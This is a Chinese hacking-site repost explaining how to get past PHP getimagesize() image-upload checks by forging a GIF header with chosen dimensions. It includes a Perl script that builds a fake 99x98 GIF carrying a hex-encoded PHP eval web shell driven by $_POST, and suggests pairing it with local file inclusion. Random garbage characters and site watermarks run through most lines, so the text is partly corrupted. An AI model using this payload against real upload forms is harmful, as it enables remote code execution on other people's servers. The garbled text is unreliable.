芝麻黑客0@2C'j4E�t�Y/`�qBypass getimagesize()函数缺陷
�H.B�s&\4{转自:cooldiyer's blog
+k�q
]�f�O#@4`�k;F"}芝麻黑客$m�t�f e�]
#x/_
v�|�}很多php代码都用getimagesize()来判断你上传文件是不是图片,很多人在黑盒测试都会使用在php代码前加个GIF89a来绕过这样的代码:芝麻黑客�m0j�P�b3t�M�[
芝麻黑客)C�w�[�?�x9d2K�Tif(getimagesize($file)){
#I�y P9h�d W�M�~�`�K�Sprint yes;芝麻黑客0q
N1c2D�x�r
}else{
�D�r�H4}5`�\+S�]�Z0eprint no;芝麻黑客
B
V:`1Z�h�E�p�f�?�t
}芝麻黑客%f1X�{-T$O&w,]�I&|�i�i
芝麻黑客�_�c
Q#O�o�{�| 芝麻黑客6{8r�H�q o!N7n6v
)\/l�e�v#a6\ w-H�c�K但是有很多的情况还有其他的限制,比如分辨率n x n 如以下代码:芝麻黑客3`�|�Q!Z�n
芝麻黑客&L�h�z�y
bif ($size = @getimagesize(IMAGES."avatars/".$avatarname)) {芝麻黑客0y�U*b/?�]'E�p
if ($size['0'] > 100 || $size['1'] > 100) {芝麻黑客 {)z
j)M;m:_6M:~(|�l
unlink(IMAGES."avatars/".$avatarname);
:j#\�[�y#g*I�Y$set_avatar = "";芝麻黑客�U�w3h�o�j�{�l�r�h�v�H&R
芝麻黑客&d�R#V#\�L+U�s�P�D3E
4E)['l�M!t4i芝麻黑客�k4~9V�Q
U�P
w�M先看看gif文件头:
�p$b8W�L:e�T�Y8U'D&i�d�j$H&]�o
7b
k+@$w C�F�f00000000h: 47 49 46 38 39 61 AB 02 E5 03 B3 00 00 00 80 00 ; GIF89a???..?.芝麻黑客)S$Z0C#L�l
G I F 8 9 a $size['0'] $size['1']芝麻黑客�?�O
y�d4S7h
$size['0']x$size['1'] = [AB 02]683 x [E5 03]997芝麻黑客/K�R�e;B2O�l�_�i�g
芝麻黑客:]�h;E�V�u�E�k�O%\6E�B�x 芝麻黑客&T
L/u'v�W1c�i7U�X�j�n
芝麻黑客5B�G�j v(u8sperl代码:芝麻黑客.{!W�`�A*?
芝麻黑客�I9n�o)t�F:k�|�L芝麻黑客�K7U5]1i�U7Y$w
#!/usr/bin/perl
+W#Z�N�m�^�f4g#The Script could pass getimagesize()芝麻黑客�w
@�Z�v�M3I
芝麻黑客:I!p-m�O�u7?#gif size: 99x98 pixels
!A2h6b�E�v*H$gifhead="\x47\x49\x46\x38\x39\x61". #GIF89a
%K7{�|/G�i-G�X5W&i�L"\x63\x00".#99
,}�a2~�H�y�L
?�?"\x62\x00";#98芝麻黑客:H�v�x
T'v"|2i,K6o8m
芝麻黑客�z
Q�K s�p&`�U�n�S
`$phpcode="\x3c\x3f\x70\x68\x70\x20\x40\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x63\x5d\x29\x3f\x3e";#<?php @eval
&t$F�e(}�c芝麻黑客�E�~$s0[,T"K/`�X+W�R�]($_POST[c])?>芝麻黑客�^�@3~�N�x�[
�[�l!p5z�G�^�J�Xprint $gifhead.$phpcode;
8U;k�k;Y/R0}*n�o芝麻黑客�Q�S�m3A�[7P:L,q�G
1?5S�u5E�x�i�}�R�\芝麻黑客%O)z7j
g�z�E�y8y�y�p$R
�\8M3P-j�A�D应该说getimagesize只是一部分检测 这样要和其他漏洞配合,比如本地包含 一般上穿严格限制了文类型 还用getimagesize判断是不是图片 。芝麻黑客�P F'w&j+w!e�^
比如:http://www.4ngel.net/article/57.htm芝麻黑客#}5P6Y�q'\'N�k
TAG:
Bypass
缺陷
getimagesize
函数
